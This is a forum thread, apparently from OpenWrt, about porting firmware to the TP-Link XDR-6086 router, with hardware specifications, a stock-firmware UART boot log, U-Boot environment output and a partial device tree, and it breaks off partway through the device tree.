Adding support for TP-Link XDR-6086

Chinese Teardown: https://www.acwifi.net/21922.html

Specifications:

  • SoC : MediaTek MT7986A
  • RAM : DDR3 512MiB (ESMT M15T4G16256A)
  • Flash : SPI-NAND 128 MiB (ESMT F50L1G41LB)
  • WLAN :
    • 2.4G : MediaTek MT7976GN
    • 5G : MediaTek MT7976AN
  • Ethernet :
    • Switch1 : MediaTek MT7531A
  • Power : 12 VDC, 4A

Looks like a nice 2.5G MediaTek device!

1 Like

Well there's already support fo the Filogic target, so shouldn't be too difficult to add it when someone capable gets their hands on it.

1 Like

Realtek RTL8221B is a single port 2.5G PHY, not a switch. There are two of them in this device, probably one is connected directly to the MT7986 SoC and the other one to the SGMII port 5 of MT7531 switch.

2 Likes

Fixed, thanks for pointing that out.

I already have 2 Xiaomi Redmi AX6000s (Filogic 830) running OpenWrt so I suspect this won't be too difficult assuming TP-Link didn't lock us out of everything. I have one ordered from AliExpress, might be a month or so before it arrives.

Here's the bootlog: https://pastebin.com/dFfuHkxd

F0: 102B 0000
FA: 1040 0000
FA: 1040 0000 [0200]
F9: 0000 0000
V0: 0000 0000 [0001]
00: 0000 0000
BP: 2400 0041 [0000]
G0: 1190 0000
EC: 0000 0000 [1000]
T0: 0000 0142 [010F]
Jump to BL

NOTICE:  BL2: v2.6(release):220705_xdr6088mtv1-canoe_r17-dirty
NOTICE:  BL2: Built : 07:05:56, Jul  4 2022
NOTICE:  WDT: disabled
rtl8221 reset pull down by gpio13
rtl8221 reset pull down by gpio17
NOTICE:  EMI: Using DDR3 settings
NOTICE:  EMI: Detected DRAM size: 512MB
NOTICE:  EMI: complex R/W mem test passed
NOTICE:  SPI_NAND parses attributes from parameter page.
NOTICE:  SPI_NAND Detected ID 0x35
NOTICE:  Page size 2048, Block size 131072, size 134217728
NOTICE:  BL2: Booting BL31
NOTICE:  BL31: v2.6(release):220705_xdr6088mtv1-canoe_r17-dirty
NOTICE:  BL31: Built : 07:05:56, Jul  4 2022


U-Boot 2022.04-rc1 (Jul 04 2022 - 07:05:56 +0000)

CPU:   MediaTek MT7986
Model: mt7986-rfb
DRAM:  512 MiB
Core:  42 devices, 15 uclasses, devicetree: embed
MMC:   mmc@11230000: 0
Loading Environment from MTD... spi-nand: spi_nand spi_nand@1: GigaDevice SPI NAND was found.
spi-nand: spi_nand spi_nand@1: 128 MiB, block size: 128 KiB, page size: 2048, OOB size: 64
*** Warning - bad CRC, using default environment

In:    serial@11002000
Out:   serial@11002000
Err:   serial@11002000
  Use slp to stop autoboot: 500ms 
'spi-nand0' is now active device
Reading from 0x4c0000 to 0x4c00cf, size 0xd0 ...
Succeeded
verifying  partition...
Reading from 0x3c0000 to 0x3fffff, size 0x40000 ...
Succeeded
ok
verifying  partition...
Reading from 0x520000 to 0xb9ffff, size 0x680000 ...
Succeeded
Reading from 0xc60000 to 0x445ffff, size 0x3800000 ...
Succeeded
ok
Reading from 0x4c0000 to 0x4dffff, size 0x20000 ...
Succeeded
Reading from 0x3c0000 to 0x3fffff, size 0x40000 ...
Succeeded
boot image at 41000000

U-Boot 2022.04-rc1 (Jul 04 2022 - 07:05:56 +0000)

CPU:   MediaTek MT7986
Model: mt7986-rfb
DRAM:  512 MiB
Core:  42 devices, 15 uclasses, devicetree: embed
MMC:   mmc@11230000: 0
Loading Environment from MTD... spi-nand: spi_nand spi_nand@1: GigaDevice SPI NAND was found.
spi-nand: spi_nand spi_nand@1: 128 MiB, block size: 128 KiB, page size: 2048, OOB size: 64
*** Warning - bad CRC, using default environment

In:    serial@11002000
Out:   serial@11002000
Err:   serial@11002000
'spi-nand0' is now active device
Reading from 0x4c0000 to 0x4dffff, size 0x20000 ...
Succeeded
Reading from 0x520000 to 0xc1ffff, size 0x700000 ...
Succeeded
## Loading kernel from FIT Image at 46000000 ...
   Using 'config-1' configuration
   Trying 'kernel-1' kernel subimage
     Description:  ARM64 OpenWrt Linux-5.4.168
     Type:         Kernel Image
     Compression:  lzma compressed
     Data Start:   0x460000e8
     Data Size:    4447404 Bytes = 4.2 MiB
     Architecture: AArch64
     OS:           Linux
     Load Address: 0x44080000
     Entry Point:  0x44080000
     Hash algo:    crc32
     Hash value:   c34bda4d
     Hash algo:    sha1
     Hash value:   9bbdeadb4f276b60a5b277f1f1c8b09e0e02d3f9
## Loading fdt from FIT Image at 46000000 ...
   Using 'config-1' configuration
   Trying 'fdt-1' fdt subimage
     Description:  ARM64 OpenWrt xdr6086mtv1 device tree blob
     Type:         Flat Device Tree
     Compression:  uncompressed
     Data Start:   0x4643ded0
     Data Size:    21160 Bytes = 20.7 KiB
     Architecture: AArch64
     Hash algo:    crc32
     Hash value:   84ef023b
     Hash algo:    sha1
     Hash value:   707dca22fb85c0f7de179ddae4c73968f9b5c2ef
   Booting using the fdt blob at 0x4643ded0
   Uncompressing Kernel Image
   Loading Device Tree to 000000005f7f0000, end 000000005f7f82a7 ... OK

Starting kernel ...

- preinit -
- regular preinit -
switching to jffs2
- init -

Please press Enter to activate this console. /etc/rc.common: line 104: config_load: not found
/etc/rc.common: line 104: config_foreach: not found
/etc/rc.common: line 104: config_foreach: not found
/etc/rc.common: line 104: config_foreach: not found
/etc/rc.common: line 87: config_load: not found
/etc/rc.common: line 87: config_get: not found
grep: /tmp/nas_data: No such file or directory
grep: /tmp/nas_data: No such file or directory
grep: /tmp/nas_data: No such file or directory
grep: /tmp/nas_data: No such file or directory
grep: /tmp/nas_data: No such file or directory
sh: out of range
sh: out of range
	mcbAlignFromPool(235). Fail to alloc 552000 bytes from mcb Generic, alloc from heap [<0x7f833c7020>].
	mcbAlignFromPool(235). Fail to alloc 883200 bytes from mcb Generic, alloc from heap [<0x7f83376020>].
	mcbAlignFromPool(235). Fail to alloc 1214400 bytes from mcb Generic, alloc from heap [<0x7f83325020>].
grep: /tmp/nas_data: No such file or directory
sh: out of range
/etc/rc.common: .: line 6: can't open '/lib/pppox/pppox-default-variables.sh'
/etc/rc.common: line 87: config_load: not found
/etc/rc.common: line 87: config_get: not found
 <ucconv> usrconfPathPrepare(38). /tmp/etc/config doesn't exit, Now create it.
	systemLoadSysmode(753). get workform 0
	systemLoadSysmode(761). get mngt_mode 3, work_mode 0, controller_detect_mode 0
	initGmacPortInfo(304). gmac0 include port0,  support switch
	initGmacPortInfo(304). gmac0 include port1,  support switch
	initGmacPortInfo(304). gmac0 include port2,  support switch
	initGmacPortInfo(304). gmac0 include port3,  support switch
	initGmacPortInfo(304). gmac0 include port4,  support switch
	initGmacPortInfo(304). gmac1 include port5, no support switch
### dhcp event command register. ###
### dhcpv6 event command register. ###
	checkOrResetFactoryInfo(988). Factory Info verified
statsService init
.[relay_mode_config_notify:42] sysModeGetWorkMode: 4
[relay_mode_config_notify:42] sysModeGetWorkMode: 4
[wanPortDetectCheckAllLan:113] sysModeGetWorkMode: 4
	deviceInfoInit(975). softver:1.0.5 Build 220809 Rel.49402
[wireless]priv_cmd_table_get[208]invalid priv cmd table
[wireless]driver_if_init[289]error code is: -1

[wireless]driver_if_init[290]get iwpriv cmd table failed!

  ioctl[iwpriv ra0 set setMacAddr=F4:84:8D:6D:2C:31] failed Network is down
  ioctl[iwpriv rax0 set setMacAddr=F4:84:8D:6D:2C:33] failed No such device
	br_scan_ifaces(47). Scanning bridge netif...
	topology_init_self_device(4554). init mesh group id: [00:00:00:00:00:00]
	autoconf_business_init(2064). init wlan_dev_num:0

	autoconf_business_init(2064). init wlan_dev_num:1

init wss module.
	event_sock_enable(1195). enabled netlink socket at 23 with own pid 1361

	jsonObjectToFile(290). Trying to commit to flash...
	portManageLoadConfigToDevWithMode(4854). load config to dev f4:84:8d:6d:2c:31
	loadIptvConfigToDev(3561). cap sub func 3c
	loadIptvConfigToDev(3568). load iptv to dev f4:84:8d:6d:2c:31
[portManageInit:6273] sysModeGetWorkMode: 4
	optimizeOneFile(1054). Rules Optimized: 619

	optimizeOneFile(1055). Rules Unoptimized: 43

[<cloud_relay_client/dms>:<cloud_relay_client/iccCtl()/465>] local->1/1024, cmd 0x40004926, sendlen 4, iccctl_ret 0
[<cloud_relay_client/dms>:<cloud_relay_client/iccCtl()/465>] local->1/1024, cmd 0x40004921, sendlen 16, iccctl_ret 0
lanv6LocalIpv6: ::
system_set_if_ip_v6: add ip:fd00:f484:8d6d:2c31:f684:8dff:fe6d:2c31/64 to if:br-lan
	dnsProxyParamInit(196). priDnsStr = 223.6.6.6,223.6.6.6, sndDnsStr = 0.0.0.0,0.0.0.0
	dnsProxyParamInit(238). priDns6Str = 240c::6666,240c::6666, sndDns6Str = ::,::
	dnsProxyParamInit(196). priDnsStr = 223.6.6.6,223.6.6.6, sndDnsStr = 0.0.0.0,0.0.0.0
	dnsProxyParamInit(238). priDns6Str = 240c::6666,240c::6666, sndDns6Str = ::,::
[lanDhcpcInit:1676] sysModeGetWorkMode: 4
[dhcpsParamsUpdate:1328] sysModeGetWorkMode: 4
1
2
1
2
	firewallCtxInit(560). /network/wan_status/wan_status
	firewallCtxInit(560). /network/wan_status_2/wan_status_2
	updateChainInputIcmpToWanIf(222). enter icmp to wanif
ip6tables: No chain/target/match by that name.
<WARN> ipt cmd failed: ip6tables -w -t filter -F INPUT_VPN, 256
ip6tables: No chain/target/match by that name.
<WARN> ipt cmd failed: ip6tables -w -t filter -F FORWARD_VPN, 256
ip6tables: No chain/target/match by that name.
<WARN> ipt cmd failed: ip6tables -w -t nat -F POSTROUTING_VPN, 256
statsService start.
===============DHCP_TIMEOUT=30
[wanStartIndex:4850] sysModeGetWorkMode: 4
[wanPortDetectCheckAllLan:113] sysModeGetWorkMode: 4
[miniUPnPStart:831] sysModeGetWorkMode: 4
[upnpdStart:1448] sysModeGetWorkMode: 4
  ioctl[iwpriv ra0 set Workform=0] failed Invalid argument
  ioctl[iwpriv rax0 set Workform=0] failed Invalid argument
[wireless]wlan_ioctl_set_allow_probereq_event[2635]wlan_ioctl_set_allow_probereq_event not implemented in mtk!!
[wireless]wlan_ioctl_set_allow_probereq_event[2635]wlan_ioctl_set_allow_probereq_event not implemented in mtk!!
  ioctl[iwpriv ra0 set SetAlmac=F4:84:8D:6D:2C:31] failed Invalid argument
[wireless]ioctlCmdSetAlmac[1052]Set almac f4:84:8d:6d:2c:31

  ioctl[iwpriv rax0 set SetAlmac=F4:84:8D:6D:2C:31] failed Invalid argument
[wireless]ioctlCmdSetAlmac[1052]Set almac f4:84:8d:6d:2c:31

[wireless]ioctl_wlanSetMapdRole[1082]map_role:0

	cloudNmsModuleConfigVersionInit(4384). Read Module:wireless SubModule:wlan_host_2g version failed!
	cloudNmsModuleConfigVersionInit(4384). Read Module:wireless SubModule:wlan_host_5g version failed!
	cloudNmsModuleConfigVersionInit(4384). Read Module:wireless SubModule:wlan_bs version failed!
	mesh_set_cap_info(139). set wan status 0, CAP AL MAC 00:00:00:00:00:00
	netif_port_update_handle(962). all set 1905 enable
ps_app_init 2074 Path selection app init...
Init User_Flush_Fcache
[error] WRITE FILE ERRORwxx maxDownloadSpeed 0, maxUploadSpeed 0
rmmod: can't unload 'br_guest_filter': unknown symbol in module, or unknown parameter
[wdsSetConfigRouter:658] sysModeGetWorkMode: 4
[wdsSetConfigRouter:658] sysModeGetWorkMode: 4
[wiredExtStart:686] sysModeGetWorkMode: 4
-->[ERROR]packetHandler | 778 - LLDP select error!!!

	taskCheckPending(359). TASK cloudBrd finished pending and continue.
	taskCheckPending(359). TASK tWlanTask finished pending and continue.
	taskBootupPending(350). TASK timerMgt finished pending and continue.
	taskCheckPending(359). TASK inetd finished pending and continue.
	taskCheckPending(359). TASK monitor finished pending and continue.
[cloudLinkHandleIfname:215] sysModeGetWorkMode: 4
[cloudLinkHandleDnsServerIp:171] sysModeGetWorkMode: 4
	station_disassociate_all_event_callback(1920). <ERROR> cannot find ra0 in topology db
	station_disassociate_all_event_callback(1920). <ERROR> cannot find ra0 in topology db
	station_disassociate_all_event_callback(1920). <ERROR> cannot find ra1 in topology db
	station_disassociate_all_event_callback(1920). <ERROR> cannot find ra1 in topology db
	station_disassociate_all_event_callback(1920). <ERROR> cannot find ra7 in topology db
	role_switch_handle_wan_detect_event(522). detect wan status 0, self_wan_status 0, cap_wan_status 0
	role_switch_handle_wan_detect_event(529). detect wan status: port[-1] internet[0] state[0]
	station_disassociate_all_event_callback(1920). <ERROR> cannot find ra7 in topology db
  ioctl[iwpriv ra0 set Channel=0] failed Invalid argument
  ioctl[iwpriv ra0 set BeaconPeriod=0] failed Invalid argument
	station_disassociate_all_event_callback(1920). <ERROR> cannot find ra0 in topology db
  ioctl[iwpriv ra0 set DtimPeriod=0] failed Invalid argument
	station_disassociate_all_event_callback(1920). <ERROR> cannot find ra0 in topology db
	system_bridge_delif(890). Sys del bridge if failed:Invalid argument
	station_disassociate_all_event_callback(1920). <ERROR> cannot find ra1 in topology db
  ioctl[iwpriv ra1 set DtimPeriod=0] failed Invalid argument
	station_disassociate_all_event_callback(1920). <ERROR> cannot find ra7 in topology db
  ioctl[iwpriv ra7 set DtimPeriod=0] failed Invalid argument
	station_disassociate_all_event_callback(1920). <ERROR> cannot find ra7 in topology db
	station_disassociate_all_event_callback(1920). <ERROR> cannot find rax0 in topology db
	station_disassociate_all_event_callback(1920). <ERROR> cannot find rax0 in topology db
	station_disassociate_all_event_callback(1920). <ERROR> cannot find rax7 in topology db
	station_disassociate_all_event_callback(1920). <ERROR> cannot find rax7 in topology db
  ioctl[iwpriv rax0 set Channel=0] failed Invalid argument
  ioctl[iwpriv rax0 set BeaconPeriod=0] failed Invalid argument
	station_disassociate_all_event_callback(1920). <ERROR> cannot find rax0 in topology db
  ioctl[iwpriv rax0 set DtimPeriod=0] failed Invalid argument
  ioctl[iwpriv rax0 set MgntFrameRate=0] failed Invalid argument
	station_disassociate_all_event_callback(1920). <ERROR> cannot find rax0 in topology db
	station_disassociate_all_event_callback(1920). <ERROR> cannot find rax7 in topology db
  ioctl[iwpriv rax7 set DtimPeriod=0] failed Invalid argument
  ioctl[iwpriv rax7 set MgntFrameRate=0] failed Invalid argument
	station_disassociate_all_event_callback(1920). <ERROR> cannot find rax7 in topology db
[wireless]wlan_ioctl_set_allow_probereq_event[2635]wlan_ioctl_set_allow_probereq_event not implemented in mtk!!
[wireless]wlan_ioctl_set_allow_probereq_event[2635]wlan_ioctl_set_allow_probereq_event not implemented in mtk!!
	fsLoadFinishCallback(132). JFFS LOAD: Exec file migration.
	ctrlLoadFinishCallback(1160). Exec smp.sh.
	br_scan_ifaces(47). Scanning bridge netif...
	topology_update_local_iface(4338).   == Iface vir-eth0.1 already exist...
	topology_update_local_iface(4338).   == Iface vir-eth0.2 already exist...
	topology_update_local_iface(4338).   == Iface vir-eth0.3 already exist...
	topology_update_local_iface(4338).   == Ifac[   33.601232] 7986@C08L1ra7,UpdateBeaconHandler() 2060: wdev(1) bss not ready (state:0, caller:meshImple_UpdateFhBeacon+0x74/0xa0 [mt7986b])!!
e vir-eth0.4 alr[   33.614423] [MESH]set almac to f4:84:8d:6d:2c:31
eady exist...
	topology_update_local_iface(4338).   == Iface vir-eth0.5 already exist...
	topology_update_local_iface(4338).   == Iface vir-eth1 already exist...
	topology_update_local_iface(4342).   ++ Iface bond0 add to self device...
	topology_update_local_iface(4332).   ** Iface ra5 with zero mac ignored...
	topology_update_local_iface(4332).   ** Iface ra3 with zero mac ignored...
	topology_update_local_iface(4332).   ** Iface ra2 with zero mac ignored...
	topology_update_local_iface(4332).   ** Iface ra4 with zero mac ignored...
	topology_update_local_iface(4332).   ** Iface rax3 with zero mac ignored...
	topology_update_local_iface(4342).   ++ Iface rax7 add to self device...
	topology_update_local_iface(4342).   ++ Iface ra7 add to self device...
	topology_update_local_iface(4332).   ** Iface rax2 with zero mac ignored...
	topology_update_local_iface(4332).   ** Iface ra6 with zero mac ignored...
	topology_update_local_iface(4332).   ** Iface rax4 with zero mac ignored...
	topology_update_local_iface(4342).   ++ Iface apcli0 add to self device...
	topology_update_local_iface(4342).   ++ Iface apclix0 add to self device...
	topology_update_local_iface(4342).   ++ Iface rax0 add to self device...
	topology_update_local_iface(4332).   ** Iface rax6 with zero mac ignored...
	topology_update_local_iface(4342).   ++ Iface ra1 add to self device...
	topology_update_local_iface(4332).   ** Iface rax5 with zero mac ignored...
	topology_update_local_iface(4332).   ** Iface rax1 with zero mac ignored...
	topology_update_local_iface(4342).   ++ Iface ra0 add to self device...
	mwifi_channel_update_handle(755). MWi-Fi Channel update handle: radio band:0 channel switch from channel:0 to 1

	mwifi_channel_update_handle(755). MWi-Fi Channel update handle: radio band:1 channel switch from channel:0 to 40

	mesh_allow_ext_on_band(2136). [mapd] allow RE with almac f4:84:8d:6d:2c:31 to access band 0
	mesh_allow_ext_on_band(2136). [mapd] allow RE with almac f4:84:8d:6d:2c:31 to access band 1
STEER Config(valid 1):
enable: 1
ssid[2G] : TP-LINK_2C31
ssid[5G] : TP-LINK_2C31
topology status: StandAlone
Module:
	enable: 1
	chan_util_interval: 30
	chan_util_samples: 6
	chan_util_overload_2g: 70
	chan_util_overload_5g: 90
	rssi_5g_prefer_2g: 42
	rssi_5g_prefer_5g: 12
	rssi_low_2g: 0
	rssi_high_2g: 35
	rssi_high_2g_direct_btm: 42
	rssi_low_5g_direct_btm: 8
	rssi_low_5g: 8
	rssi_high_5g: 255
	rate_low_2g: 10
	rate_high_2g: 20
	rate_low_5g: 70
	rate_high_5g: 100
	timeout_bcnrpt: 2
	retry_bcnrpt: 1
	timeout_btm: 1
	retry_btm: 5
	phyrate_scaling_2g: 70
	phyrate_scaling_5g: 70
	band_hide_enable: 1
	band_hide_rssi_2g: 255
	band_hide_rssi_5g: 20
Presteer:
	enable: 1
	auth_rej_max: 2
	timeout: 15
	blackout: 600
	assoc_thres: 0
	diff_thres: 0
Poststeer:
	enable: 1
	node_inact_interval: 10
	blackout_legacy: 600
	blackout_btm: 60
	timeout_idle_legacy: 15
	auth_rej_max: 2
APsteer:
	enable: 1
	auth_rej_max: 2
	timeout_notify: 2
	retry_notify: 5
	timeout_requested: 60
	aps_remote_timeout: 10
	blackout: 60
	rssi_low_2g_first: 30
	rssi_low_2g_second: 20
	rssi_low_2g_third: 10
	rssi_low_5g_first: 25
	rssi_low_5g_second: 15
	rssi_low_5g_third: 8
Offload:
	enable: 1
	blackout: 60
	cap_primary_band: 1
	re_primary_band: 1
	trigger_delta_num: 5
	trigger_interval: 1
start wss module.
Start wlan smart steer as g_wss_topology_status 0 Standalone.
Start wlan smart steer as g_wss_topology_status 0 Standalone.
_wlan_ioctl_set_bs_enable enable ra0
_wlan_ioctl_set_bs_enable enable rax0
	onboarding_ioctl_priv_ext(154). ioctl[ra7:0x88A9] request failed Invalid argument.
	mwifi_wlan_ready_event_handle(576). MWi-Fi start at wlan ready

Recieved dup pkt siwtch
Dup pkt switch off
Recieved dup pkt siwtch
	role_selection_wlan_ready_handle(742). [role selection] no need to scan better ap for RE/unpaired device, return
[cloudLinkHandleIfname:215] sysModeGetWorkMode: 4
[cloudLinkHandleDnsServerIp:171] sysModeGetWorkMode: 4
	pair_probe_start(2053). start factory RE scan!!!
	lan_business_handle_wan_detect_result(2441). [lan business] Get wan status: port[-1] internet[0] state[0]
	role_switch_handle_wan_detect_event(522). detect wan status 0, self_wan_status 0, cap_wan_status 0
	role_switch_handle_wan_detect_event(529). detect wan status: port[-1] internet[0] state[0]
[cloudLinkHandleIfname:215] sysModeGetWorkMode: 4
[cloudLinkHandleDnsServerIp:171] sysModeGetWorkMode: 4
[cloudLinkHandleIfname:215] sysModeGetWorkMode: 4
[cloudLinkHandleDnsServerIp:171] sysModeGetWorkMode: 4

U-Boot can be entered by spamming slp into the console during boot, but it appears most commands are locked. Only ones I've found to work are printenv and reset.

MT7986> printenv
baudrate=115200
bootdelay=2
ethaddr=92:74:0b:59:4e:9b
fdtcontroladdr=5ffc4080
ipaddr=192.168.1.1
loadaddr=0x46000000
netmask=255.255.255.0
serverip=192.168.1.100
stderr=serial@11002000
stdin=serial@11002000
stdout=serial@11002000
verify=n

Environment size: 240/131068 bytes

For those wondering, the header pictured here at the top right of the board is UART: https://www.acwifi.net/wp-content/uploads/2022/08/DSC_6970.jpg

I sent 2 separate e-mails to TP-Link, one asking for GPL source and another asking for the latest fw version for the device as I couldn't find it on their website. I received a reply to the firmware request asking my specific need for it as they don't usually give it out and then decided it not worth my time dealing with Chinese tech companies that ignore GPL anyways so I dumped the whole fw from the device.

Here's the dts:

/dts-v1/;

/ {
	compatible = "mediatek,mt7986a-spim-snand-rfb";
	interrupt-parent = <0x01>;
	#address-cells = <0x02>;
	#size-cells = <0x02>;
	model = "MediaTek MT7986a RFB";

	cpus {
		#address-cells = <0x01>;
		#size-cells = <0x00>;

		cpu@0 {
			device_type = "cpu";
			compatible = "arm,cortex-a53";
			enable-method = "psci";
			reg = <0x00>;
		};

		cpu@1 {
			device_type = "cpu";
			compatible = "arm,cortex-a53";
			enable-method = "psci";
			reg = <0x01>;
		};

		cpu@2 {
			device_type = "cpu";
			compatible = "arm,cortex-a53";
			enable-method = "psci";
			reg = <0x02>;
		};

		cpu@3 {
			device_type = "cpu";
			enable-method = "psci";
			compatible = "arm,cortex-a53";
			reg = <0x03>;
		};
	};

	wed@15010000 {
		compatible = "mediatek,wed";
		wed_num = <0x02>;
		pci_slot_map = <0x00 0x01>;
		reg = <0x00 0x15010000 0x00 0x1000 0x00 0x15011000 0x00 0x1000>;
		interrupt-parent = <0x01>;
		interrupts = <0x00 0xcd 0x04 0x00 0xce 0x04>;
	};

	wed2@15011000 {
		compatible = "mediatek,wed2";
		wed_num = <0x02>;
		reg = <0x00 0x15010000 0x00 0x1000 0x00 0x15011000 0x00 0x1000>;
		interrupt-parent = <0x01>;
		interrupts = <0x00 0xcd 0x04 0x00 0xce 0x04>;
	};

	wdma@15104800 {
		compatible = "mediatek,wed-wdma";
		reg = <0x00 0x15104800 0x00 0x400 0x00 0x15104c00 0x00 0x400>;
	};

	ap2woccif@151A5000 {
		compatible = "mediatek,ap2woccif";
		reg = <0x00 0x151a5000 0x00 0x1000 0x00 0x151ad000 0x00 0x1000>;
		interrupt-parent = <0x01>;
		interrupts = <0x00 0xd3 0x04 0x00 0xd4 0x04>;
	};

	wocpu0_ilm@151E0000 {
		compatible = "mediatek,wocpu0_ilm";
		reg = <0x00 0x151e0000 0x00 0x8000>;
	};

	wocpu1_ilm@151F0000 {
		compatible = "mediatek,wocpu1_ilm";
		reg = <0x00 0x151f0000 0x00 0x8000>;
	};

	wocpu_dlm@151E8000 {
		compatible = "mediatek,wocpu_dlm";
		reg = <0x00 0x151e8000 0x00 0x2000 0x00 0x151f8000 0x00 0x2000>;
		resets = <0x02 0x00>;
		reset-names = "wocpu_rst";
	};

	wocpu_boot@15194000 {
		compatible = "mediatek,wocpu_boot";
		reg = <0x00 0x15194000 0x00 0x1000>;
	};

	reserved-memory {
		#address-cells = <0x02>;
		#size-cells = <0x02>;
		ranges;

		secmon@43000000 {
			reg = <0x00 0x43000000 0x00 0x30000>;
			no-map;
		};

		wmcpu-reserved@4FC00000 {
			compatible = "mediatek,wmcpu-reserved";
			no-map;
			reg = <0x00 0x4fc00000 0x00 0x100000>;
			phandle = <0x17>;
		};

		wocpu0_emi@4FD00000 {
			compatible = "mediatek,wocpu0_emi";
			no-map;
			reg = <0x00 0x4fd00000 0x00 0x40000>;
			shared = <0x00>;
		};

		wocpu1_emi@4FD40000 {
			compatible = "mediatek,wocpu1_emi";
			no-map;
			reg = <0x00 0x4fd40000 0x00 0x40000>;
			shared = <0x00>;
		};

		wocpu_data@4FD80000 {
			compatible = "mediatek,wocpu_data";
			no-map;
			reg = <0x00 0x4fd80000 0x00 0x240000>;
			shared = <0x01>;
		};
	};

	psci {
		compatible = "arm,psci-0.2";
		method = "smc";
	};

	oscillator@0 {
		compatible = "fixed-clock";
		#clock-cells = <0x00>;
		clock-frequency = <0x2625a00>;
		clock-output-names = "clkxtal";
		phandle = <0x21>;
	};

	dummy_system_clk {
		compatible = "fixed-clock";
		clock-frequency = <0x2625a00>;
		#clock-cells = <0x00>;
		phandle = <0x20>;
	};

	timer {
		compatible = "arm,armv8-timer";
		interrupt-parent = <0x01>;
		clock-frequency = <0xc65d40>;
		interrupts = <0x01 0x0d 0x08 0x01 0x0e 0x08 0x01 0x0b 0x08 0x01 0x0a 0x08>;
	};

	infracfg_ao@10001000 {
		compatible = "mediatek,mt7986-infracfg_ao\0syscon";
		reg = <0x00 0x10001000 0x00 0x68>;
		#clock-cells = <0x01>;
		phandle = <0x04>;
	};

	infracfg@10001040 {
		compatible = "mediatek,mt7986-infracfg\0syscon";
		reg = <0x00 0x1000106c 0x00 0x1000>;
		#clock-cells = <0x01>;
		phandle = <0x03>;
	};

	topckgen@1001B000 {
		compatible = "mediatek,mt7986-topckgen\0syscon";
		reg = <0x00 0x1001b000 0x00 0x1000>;
		#clock-cells = <0x01>;
		phandle = <0x05>;
	};

	apmixedsys@1001E000 {
		compatible = "mediatek,mt7986-apmixedsys\0syscon";
		reg = <0x00 0x1001e000 0x00 0x1000>;
		#clock-cells = <0x01>;
		phandle = <0x0d>;
	};

	watchdog@1001c000 {
		compatible = "mediatek,mt7986-wdt";
		reg = <0x00 0x1001c000 0x00 0x1000>;
		interrupts = <0x00 0x6e 0x04>;
		#reset-cells = <0x01>;
		status = "okay";
		phandle = <0x16>;
	};

	interrupt-controller@c000000 {
		compatible = "arm,gic-v3";
		#interrupt-cells = <0x03>;
		interrupt-parent = <0x01>;
		interrupt-controller;
		reg = <0x00 0xc000000 0x00 0x40000 0x00 0xc080000 0x00 0x200000>;
		interrupts = <0x01 0x09 0x04>;
		phandle = <0x01>;
	};

	pwm@10048000 {
		compatible = "mediatek,mt7986-pwm";
		reg = <0x00 0x10048000 0x00 0x1000>;
		#clock-cells = <0x01>;
		#pwm-cells = <0x02>;
		interrupts = <0x00 0x89 0x04>;
		clocks = <0x03 0x05 0x04 0x07 0x04 0x0c 0x04 0x0d>;
		assigned-clocks = <0x05 0x3c 0x04 0x07 0x04 0x05 0x04 0x06>;
		assigned-clock-parents = <0x05 0x03 0x03 0x05 0x03 0x05 0x03 0x05>;
		clock-names = "top\0main\0pwm1\0pwm2";
		status = "okay";
		pinctrl-names = "default";
		pinctrl-0 = <0x06 0x07>;
	};

	serial@11002000 {
		compatible = "mediatek,mt7986-uart\0mediatek,mt6577-uart";
		reg = <0x00 0x11002000 0x00 0x400>;
		interrupts = <0x00 0x7b 0x04>;
		clocks = <0x04 0x1c>;
		assigned-clocks = <0x05 0x3b 0x04 0x00>;
		assigned-clock-parents = <0x05 0x00 0x03 0x01>;
		status = "okay";
	};

	serial@11003000 {
		compatible = "mediatek,mt7986-uart\0mediatek,mt6577-uart";
		reg = <0x00 0x11003000 0x00 0x400>;
		interrupts = <0x00 0x7c 0x04>;
		clocks = <0x04 0x1d>;
		assigned-clocks = <0x04 0x01>;
		assigned-clock-parents = <0x03 0x00>;
		status = "okay";
		pinctrl-names = "default";
		pinctrl-0 = <0x08>;
	};

	serial@11004000 {
		compatible = "mediatek,mt7986-uart\0mediatek,mt6577-uart";
		reg = <0x00 0x11004000 0x00 0x400>;
		interrupts = <0x00 0x7d 0x04>;
		clocks = <0x04 0x1e>;
		assigned-clocks = <0x04 0x02>;
		assigned-clock-parents = <0x03 0x00>;
		status = "okay";
		pinctrl-names = "default";
		pinctrl-0 = <0x09>;
	};

	i2c@11008000 {
		compatible = "mediatek,mt7986-i2c";
		reg = <0x00 0x11008000 0x00 0x90 0x00 0x10217080 0x00 0x80>;
		interrupts = <0x00 0x88 0x04>;
		clock-div = <0x05>;
		clocks = <0x04 0x1b 0x04 0x17>;
		clock-names = "main\0dma";
		#address-cells = <0x01>;
		#size-cells = <0x00>;
		status = "okay";
		pinctrl-names = "default";
		pinctrl-0 = <0x0a>;

		wm8960@1a {
			compatible = "wlf,wm8960";
			reg = <0x1a>;
			phandle = <0x24>;
		};
	};

	thermal-zones {

		cpu-thermal {
			polling-delay-passive = <0x3e8>;
			polling-delay = <0x3e8>;
			thermal-sensors = <0x0b 0x00>;
		};
	};

	thermal@1100c800 {
		#thermal-sensor-cells = <0x01>;
		compatible = "mediatek,mt7986-thermal";
		reg = <0x00 0x1100c800 0x00 0x800>;
		interrupts = <0x00 0x8a 0x04>;
		clocks = <0x04 0x1a 0x04 0x2b 0x04 0x2c>;
		clock-names = "therm\0auxadc\0adc_32k";
		mediatek,auxadc = <0x0c>;
		mediatek,apmixedsys = <0x0d>;
		nvmem-cells = <0x0e>;
		nvmem-cell-names = "calibration-data";
		phandle = <0x0b>;
	};

	pcie@11280000 {
		compatible = "mediatek,mt7986-pcie";
		reg = <0x00 0x11280000 0x00 0x5000>;
		reg-names = "pcie-mac";
		#address-cells = <0x03>;
		#size-cells = <0x02>;
		interrupts = <0x00 0xa8 0x04>;
		bus-range = <0x00 0xff>;
		ranges = <0x82000000 0x00 0x20000000 0x00 0x20000000 0x00 0x10000000>;
		status = "okay";
		clocks = <0x04 0x08 0x04 0x32 0x04 0x33 0x04 0x34 0x04 0x35>;
		#interrupt-cells = <0x01>;
		interrupt-map-mask = <0x00 0x00 0x00 0x07>;
		interrupt-map = <0x00 0x00 0x00 0x01 0x0f 0x00 0x00 0x00 0x00 0x02 0x0f 0x01 0x00 0x00 0x00 0x03 0x0f 0x02 0x00 0x00 0x00 0x04 0x0f 0x03>;
		pinctrl-names = "default";
		pinctrl-0 = <0x10>;

		interrupt-controller {
			interrupt-controller;
			#address-cells = <0x00>;
			#interrupt-cells = <0x01>;
			phandle = <0x0f>;
		};
	};

	crypto@10320000 {
		compatible = "inside-secure,safexcel-eip97";
		reg = <0x00 0x10320000 0x00 0x40000>;
